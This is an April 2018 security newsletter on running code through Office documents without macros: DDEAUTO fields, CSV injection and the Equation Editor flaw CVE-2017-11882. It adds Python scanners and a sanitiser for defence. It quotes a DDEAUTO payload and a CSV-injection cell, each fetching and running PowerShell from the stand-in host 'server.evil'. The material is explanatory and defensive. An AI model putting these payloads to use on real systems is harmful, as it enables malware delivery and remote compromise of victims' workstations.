Abusing office documents without macro – Newsletter Excellium April 2018

This newsletter will give you an overview of different threats based on Microsoft Office documents able to execute malicious code without using macros. While some of the presented attacks rely on vulnerabilities already patched by Microsoft, others take advantage of legitimate features, and as such can only be mitigated, not completely disabled.

by adidionxlm

Macros are dangerous, you can block them

It is a well-known fact that malware has been hiding in Office documents’ macros for several years now. Office documents are often used as a vector for spreading malware because the Office suite is widely deployed in enterprise environments. It is easy to create documents that look familiar, such as reports, invoices or spreadsheets, and thus will be trusted by the victims. Furthermore, as macros are commonly used in day-to-day work, they are likely to be executed automatically, or the victim will simply enable them.

Macros are written in Visual Basic, which offers the basic functions of any programming language and is not limited to the document: commands can also be executed on the system itself. A successful attack is often multi-staged: it first abuses the victim’s trust to activate the macro, then relies on Visual Basic functions to download and install more sophisticated tools, making it easier to achieve its nefarious purposes.

To protect yourself against these attacks, one recommendation is to block Office documents containing macros at your mail gateway. This drastically limits the risk of infection from this vector. Another recommendation is to allow only a trusted list of digitally signed macros to run in the organization.

Macros are blocked… and now?

While macros are still popular, there are many other ways to execute arbitrary code using Office documents without relying on them. We will now describe three examples of such methods.

DDEAUTO

Dynamic Data Exchange (DDE) is a Microsoft feature that allows applications to share data and memory. Using this feature does not require macros and does not present a security warning to the user. The only indication for the user is a popup requesting permission to automatically update the links in the document.

An attacker could, for example, create a malicious Word document containing a formula field with the following payload:

{DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://server.evil/exploit.ps1');powershell -e $e"}

When opening the document, Word will try to update its “links” and ask the user’s permission to launch cmd.exe. If the user accepts, a command is launched on the targeted host, downloading a PowerShell script and executing it. This script can be, for example, ransomware encrypting all workstation and shared documents, or a Remote Access Trojan (RAT) giving the attacker total control of the workstation.

The most worrying point about this kind of attack is that it is not limited to Office documents. As DDE payloads can also be executed from Outlook, an email or a calendar invitation is enough to trigger malicious code. An attacker can therefore target a company via a phishing campaign without needing any suspicious attachment.
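As an added defensive example (not code from the newsletter), the following Python extracts the field codes from the WordprocessingML parts of a .docx and flags those beginning with DDE or DDEAUTO, joining instruction text that Word may spread over several w:instrText runs so a split field is still seen whole. The sample document.xml is constructed, with calc.exe as a placeholder payload; the scan_docx helper and the sample are assumptions, not the newsletter’s material.

```python
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
DDE_FIELD = re.compile(r"^DDE(AUTO)?\b", re.IGNORECASE)

# Constructed word/document.xml: a DDEAUTO field whose instruction text is
# split over two w:instrText runs, followed by a harmless DATE field.
SAMPLE_DOCUMENT_XML = r"""<?xml version="1.0" encoding="UTF-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p>
 <w:r><w:fldChar w:fldCharType="begin"/></w:r>
 <w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>
 <w:r><w:instrText xml:space="preserve">AUTO c:\\Windows\\System32\\cmd.exe "/k calc.exe" </w:instrText></w:r>
 <w:r><w:fldChar w:fldCharType="end"/></w:r>
 <w:r><w:fldChar w:fldCharType="begin"/></w:r>
 <w:r><w:instrText xml:space="preserve"> DATE \@ "dd/MM/yyyy" </w:instrText></w:r>
 <w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>"""


def extract_field_codes(document_xml: str) -> list:
    """Return each field's instruction text with its instrText runs joined."""
    fields, depth, current = [], 0, []
    for el in ET.fromstring(document_xml).iter():  # document order
        tag = el.tag.rsplit("}", 1)[-1]
        if tag == "fldChar":
            kind = el.get("{%s}fldCharType" % W_NS)
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:  # outermost field closed: emit it
                    fields.append(" ".join("".join(current).split()))
                    current = []
        elif tag == "instrText" and depth > 0:
            current.append(el.text or "")
    return fields


def find_dde_fields(document_xml: str) -> list:
    """Field codes starting with DDE or DDEAUTO (the vector described above)."""
    return [f for f in extract_field_codes(document_xml) if DDE_FIELD.match(f)]


def scan_docx(path: str) -> dict:
    """{part name: DDE field codes} for every word/*.xml part (body, headers, footers)."""
    with zipfile.ZipFile(path) as z:
        found = {n: find_dde_fields(z.read(n).decode("utf-8", "replace"))
                 for n in z.namelist() if n.startswith("word/") and n.endswith(".xml")}
    return {n: f for n, f in found.items() if f}
```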

CSV injection

On Windows, a Comma-Separated Values (CSV) file is opened by default with Microsoft Excel. When Excel opens the document, it parses it to split it into columns. During this operation, cells interpreted as formulas may cause Excel to execute a command.

This attack, called CSV injection, was first discovered by Context Information Security in 2014. Any cell beginning with the Equal “=”, Plus “+”, Minus “-” or At “@” sign can be used to trigger it.

For example, considering the following CSV:

UserId;BillToDate;ProjectName;DurationMinutes
1;2017-07-25;Test Project;60
2;2017-07-25;@SUM(1+2+3)+cmd|' /C powershell IEX(wget http://server.evil/exploit.ps1)'!A0"; 240

Opened with Excel, the payload downloads and executes malicious PowerShell code hosted on a website controlled by the attacker. Once again, the PowerShell script can be ransomware, a RAT, or anything malicious.
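As an added defensive example (not code from the newsletter), the following Python scans a CSV for cells Excel would treat as formulas, flags the DDE call syntax used in the payload above, and neutralises such cells before a CSV is exported. It goes slightly beyond the four prefixes listed above by also treating a leading tab or carriage return as a trigger, following OWASP’s CSV injection guidance; the sample CSV is taken from this section and the function names are assumptions.

```python
import csv
import io
import re

# Cell prefixes Excel treats as the start of a formula. The newsletter lists
# "=", "+", "-" and "@"; OWASP's CSV injection guidance adds tab and carriage
# return, which Excel also accepts in front of a formula.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")

# Excel DDE call syntax inside a formula: application|'topic'!item
DDE_PATTERN = re.compile(r"[A-Za-z0-9_.]+\|'[^']*'!")

# Constructed from the newsletter's CSV example (semicolon-delimited).
SAMPLE_CSV = (
    "UserId;BillToDate;ProjectName;DurationMinutes\n"
    "1;2017-07-25;Test Project;60\n"
    "2;2017-07-25;@SUM(1+2+3)+cmd|' /C powershell IEX(wget "
    "http://server.evil/exploit.ps1)'!A0\"; 240\n"
)


def is_formula_cell(cell: str) -> bool:
    """True if Excel would evaluate the cell instead of showing it as text."""
    return cell.startswith(FORMULA_PREFIXES)


def scan_csv(text: str, delimiter: str = ";") -> list:
    """Return (row, column, cell, uses_dde) for every formula-like cell."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text), delimiter=delimiter)):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                findings.append((r, c, cell, bool(DDE_PATTERN.search(cell))))
    return findings


def sanitise_csv(text: str, delimiter: str = ";") -> str:
    """Neutralise formula-like cells before a CSV leaves an application.

    A leading single quote makes Excel keep the cell as literal text, and
    QUOTE_ALL wraps every field and doubles embedded quotes so a payload
    cannot break out of the quoting. Trade-off: legitimate negative numbers
    ("-5") become text too, so apply this to user-controlled string columns.
    """
    out = io.StringIO()
    writer = csv.writer(out, delimiter=delimiter, quoting=csv.QUOTE_ALL,
                        lineterminator="\n")
    for row in csv.reader(io.StringIO(text), delimiter=delimiter):
        writer.writerow(["'" + cell if is_formula_cell(cell) else cell
                         for cell in row])
    return out.getvalue()
```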

Microsoft Equation Editor [CVE-2017-11882]

A vulnerability was recently found by researchers in a legacy component of Microsoft Word, the Microsoft Equation Editor. This component is used to insert and edit equations in documents. Microsoft Office 2007 introduced a new equation editor, but the legacy one was kept to ensure compatibility with older documents.

This vulnerability relies on Object Linking and Embedding (OLE), a Microsoft technology for embedding and linking objects in a document. The researchers found a way to forge an Office document that Microsoft Word fails to open properly, leading to the execution of arbitrary code.

This vulnerability has been fixed by Microsoft (see reference [3] for more details), but it is worth knowing that forgotten components may lead to a complete compromise.
